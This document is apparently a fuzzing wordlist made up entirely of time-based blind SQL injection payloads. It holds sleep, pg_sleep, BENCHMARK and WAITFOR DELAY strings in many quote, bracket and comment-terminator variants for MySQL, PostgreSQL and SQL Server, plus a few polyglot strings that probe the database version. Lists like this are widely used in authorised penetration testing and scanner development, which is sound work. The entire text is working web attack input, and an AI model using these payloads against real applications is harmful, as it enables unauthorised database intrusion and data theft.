 and sleep(5);
 and sleep(5);-- -
 and sleep(5);#
' and sleep(5);
' and sleep(5);-- -
' and sleep(5);#
') and sleep(5);
') and sleep(5);-- -
') and sleep(5);#
) and sleep(5);
) and sleep(5);-- -
) and sleep(5);#
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
 or sleep(5);
 or sleep(5);-- -
 or sleep(5);#
' or sleep(5)='
' or sleep(5);
' or sleep(5);-- -
' or sleep(5);#
') or sleep(5)='
') or sleep(5);
') or sleep(5);-- -
') or sleep(5);#
) or sleep(5);
) or sleep(5);-- -
) or sleep(5);#
;select pg_sleep(5);
;select pg_sleep(5);--
';select pg_sleep(5);
';select pg_sleep(5);--
');select pg_sleep(5);
');select pg_sleep(5);--
);select pg_sleep(5);
);select pg_sleep(5);--
;select sleep(5);
;select sleep(5);-- -
;select sleep(5);#
';select sleep(5);
';select sleep(5);-- -
';select sleep(5);#
');select sleep(5);
');select sleep(5);-- -
');select sleep(5);#
);select sleep(5);
);select sleep(5);-- -
);select sleep(5);#
SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/
 waitfor delay '00:00:05'
 waitfor delay '00:00:05'--
;waitfor delay '00:00:05'
;waitfor delay '00:00:05'--
' waitfor delay '00:00:05'
' waitfor delay '00:00:05'--
';waitfor delay '00:00:05'
';waitfor delay '00:00:05'--
') waitfor delay '00:00:05'
') waitfor delay '00:00:05'--
');waitfor delay '00:00:05'
');waitfor delay '00:00:05'--
" waitfor delay "00:00:05"
" waitfor delay "00:00:05"--
";waitfor delay "00:00:05"
";waitfor delay "00:00:05"--
") waitfor delay "00:00:05"
") waitfor delay "00:00:05"--
");waitfor delay "00:00:05"
");waitfor delay "00:00:05"--
) waitfor delay '00:00:05'
) waitfor delay '00:00:05'--
);waitfor delay '00:00:05'
);waitfor delay '00:00:05'--
